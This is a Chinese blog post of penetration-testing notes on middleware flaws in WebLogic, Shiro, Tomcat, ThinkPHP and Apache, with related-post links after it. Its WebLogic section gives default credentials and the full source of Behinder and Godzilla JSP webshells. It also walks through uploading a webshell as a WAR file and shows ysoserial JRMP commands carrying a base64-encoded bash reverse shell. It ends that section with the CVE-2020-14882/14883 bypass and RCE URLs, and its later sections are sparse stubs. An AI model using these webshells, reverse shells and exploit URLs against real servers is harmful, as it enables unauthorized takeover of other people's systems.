中间件漏洞(持续更新)

已于 2024-03-19 15:25:53 修改
阅读量871 收藏 21
点赞数 19
分类专栏: 中间件漏洞 文章标签: 中间件
于 2024-03-12 19:22:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49714982/article/details/136582590
版权

Weblogic

cms:

port defalut:7001     后台页面:http://ip:port/console   

user/pass default:weblogic,Oracle@123

常用弱口令:Default Passwords | CIRT.net

弱口令或暴力破解进去后台

1.后台GET_SHELL

http://url:7001/console->域结构->部署->安装->上载文件->浏览传入jsp木马的压缩包形式再改后缀为war(shell.jsp->右键添加到shell.zip->重命名为shell.war)上传->一直下一步直到出现完成->点击完成->访问http://url:7001/shell/shell.jsp->使用冰蝎连接

//冰蝎jsp木马  密码为rebeyond
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
    <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
        <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

2.CVE-2020-2551

环境:

cd vulhub/weblogic/weak_password
docker-compose up -d

3.CVE-2017-3248(JRMR)

环境:vulfocus->vulfocus/weblogic-CVE-2017-3248
开始漏洞利用:
0.dnslog.cn  Get SubDomain
1.使用ysoserial.jar进行监听   java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 8000 CommonsCollections1 "ping v5p75s.dnslog.cn "
2.工具利用
其中JRMR IP为开启监听的机器IP,JRMR为开启监听的机器端口, 8000端口为第二部中的 8000端口。url为存在weblogic漏洞的网页。
执行!!!!!
3.执行成功,接下来尝试进一步拿反弹shell:
开启lvnp监听
run!!!!! 
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 8000 CommonsCollections1 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE4LjAuMTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

4.getshell

sh:find / -name index.html监听的机器IP,JRMR为开启监听的机器端口,8000端口为第二部中的8000端口。url为存在weblogic漏洞找到最长的一般为网站index.html的真正路径,在该目录下输出哥斯拉一句话木马

echo '<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>'

4.CVE-2020-14882 && CVE-2020-14883(未授权访问)

环境搭建:cd vulhub/weblogic/cve-2020-14882 -> docker-compose up -d

未授权进入后台:

http://ip:port/console/css/%252e%252e%252fconsole.portal

远程RCE执行命令,可进行回显shell,步骤同上。

http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd%27);%22)

5.未授权访问+CVE-2021-2109

Shiro

CMS识别:

shiro 在登录认证的响应包中会出现 rememberMe=deleteMe

漏洞识别:

1.Shiro550 CVE-2016-4437

影响版本:Apache Shiro <= 1.2.4

2.Shiro721

影响版本:1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1

获取登陆后的setcookies:

进行猜解:

Tomcat

CMS:默认端口8080

Thinkphp

CMS:

thinkphp可以通过访问不存在的路径,使页面报错可看出是thinkphp框架

Apache 

cms:

app:“apache web server 2.4.49 2.4.50”
login_upset
关注
  • 19
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebSphere中间件漏洞总结
Birdman-one的博客
03-08 1184
WebSphere为SOA(面向服务架构)环境提供软件,以实现动态的、互联的业务流程,为所有业务情形提供高度有效的应用程序基础架构。WebSphere是IBM的应用程序和集成软件平台,包含所有必要的中间件基础架构(包括服务器、服务和工具),这些基础架构是创建、部署、运行和持续监视企业级Web应用程序和跨平台、跨产品的解决方案所必需的。与WAS6,WAS7相比较而言WAS8发生了很大的改变,其安装介质和以前截然不同;并且官网已经明确说明:版本1.7.4.7及更早版本已被1.8.x和1.9.x版本取代。
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
中间件漏洞(redis)
2301_80661529的博客
03-14 973
1.Redis服务器被挖矿案例我没有体验过,那就看看别人的把2.redis常见用途缓存、数据共享分布式、1.缓存:字符类型缓存例如:热点数据缓存(例如报表、明星出轨),对象缓存、全页缓存、可以提升热点数据的访问数据。2.数据共享分布式:字符类型因为redis是分布式的独立服务,可以在多个应用之间共享例如:分步式session3.分布式锁:字符串类型setnx方法,只有不存在时才能添加成功,返回true4.全局IDint型,incrby,利用原子性分库分表的场景,一次性拿一段5.计数器。
中间件漏洞及修复汇总
Fly_鹏程万里
10-30 3360
Nginx文件解析漏洞 漏洞等级 高危 漏洞描述 nginx文件解析漏洞产生的原因是网站中间件版本过低,可将任意文件当作php可执行文件来执行,可导致攻击者执行恶意代码来控制服务器。 漏洞危害 机密数据被窃取; 核心业务数据被篡改; 网页被篡改; 数据库所在服务器被攻击变为傀儡主机,导致局域网(内网)被入侵。 修复方案 升级中间件版本 ...
2023年红队渗透-中间件可利用漏洞汇总
apple_52661176的博客
08-31 485
在实战中,已经有很多老漏洞遇不到了,本文汇总了2023年实战中在中间件方面能比较常见的漏洞。1 IIS1.1 短文件信息收集1.2 文件解析还有点用蓝屏崩溃1.4 其他CVE-2017-7269 条件苛刻无意义。
漏洞挖掘中的各种奇淫技巧(持续更新...)
丶没胡子的猫
09-07 2024
任意密码重置 来自FreeBuf yangyangwithgnu打开的任意密码重置 任意用户密码重置(一):重置凭证泄漏 任意用户密码重置(二):重置凭证接收端可篡改 任意用户密码重置(三):用户混淆 任意用户密码重置(四):重置凭证未校验 任意用户密码重置(五):重置凭证可暴破 任意用户密码重置(六):应答中存在影响后续逻辑的状态参数 任意用户密码重置(七):Token可预测 ...
信息收集-系统&中间件层面(持续更新
weixin_44431280的博客
12-05 821
提要:当我们收集确认了目标的网络层面信息后,下一步要确认的就是目标所使用的操作系统类型(Windows/Linux等)和中间件类型(Apache,IIS,Nginx等),不同的操作系统执行命令不同,不同中间件的功能操作也不尽相同,例如RCE(远程代码/命令执行漏洞)操作前就需要判断操作系统是什么类型。 一,操作系统类型判断: 操作方法一:大小写判断 原理:Windows操作系统对大小写的解析是不明显的,Linux操作系统下大小写是不同的: Windows系统下搭建的DVWA靶场,大写文件名正常解析页面:
常见的web中间件&java框架漏洞&总结
bobo_milk的博客
05-21 1046
对近期的web中间件漏洞进行了解。因此我对常见的web中间件漏洞进行了收集以及整理。(本篇文章将持续更新) 文章目录 一、IIS 二、Apache 三、Nginx 四、Tomcat 一、IIS IIS6.x 解析漏洞 原理:服务器默认不解析; 号及其后面的内容,相当于截断 *.asp;.jpg的文件会当成asp文件执行;/*.asp文件夹下的文件也会被当作asp脚本执行 另外,IIS6.x除了会将扩展名为....
【WebLogic】Oracle发布2021第二季度WebLogic中间件漏洞公告(持续更新
cnskylee的博客
04-21 930
CVE-ID 产品 组件 协议 是否远程利用 无需授权 基础分值 攻击媒介 攻击复杂度 用户交互 受影响的 在支持版本 CVE-2021-2136 Oracle WebLogic Server Core IIOP Yes 9.8 Network Low None 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0 CVE-...
Web中间件漏洞
weixin_33924312的博客
04-15 328
Nginx文件解析漏洞端口:80 攻击方法:   解析漏洞   目录遍历   CVE-2016-1247:需要获取主机操作权限,攻击者可通过软链接任意文件来替换日志文件,从而实现提权以获取服务器的root权限。参考: https://www.seebug.org/vuldb/ssvid-92538 漏洞等级 高危 漏洞描述 nginx文件解析漏洞产生的原因是网站中...
中间件漏洞合集.zip
07-15
注:仅供学习使用,不能用于非法用途,大家可以根据需要下载。
web中间件常见漏洞总结.pdf
12-14
web中间件常见漏洞总结.pdf
Web中间件常见漏洞总结.pdf
06-14
Web中间件常见漏洞总结
中间件漏洞详解
06-11
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
【mysql数据库】mycat中间件
翡翠泪滴的博客
05-30 1131
Mycat 是数据库 中间件。 ### 2、 为什么要用 Mycat ① Java 与数据库紧耦合 。 ② 高访问量高并发对数据库的压力 。 ③ 读 写请求数据不一致。
Nuxt - middleware 路由中间件
weixin_52268321的博客
05-28 550
内联路由中间件,直接在页面内定义。命名路由中间件,放置在 middleware/ 目录下,导入在页面中。全局路由中间件,放置在 middleware/ 目录下,并以 .global 后缀结尾,在每次路由更改时运行。
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
最新发布
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
dvwa中怎么做中间件漏洞
05-30
因此,开发人员应该采取适当的措施来防止中间件漏洞的出现,例如更新软件的版本或应用程序的补丁。在实际测试中,测试人员应该使用合适的工具和技术来测试中间件漏洞,以确保应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值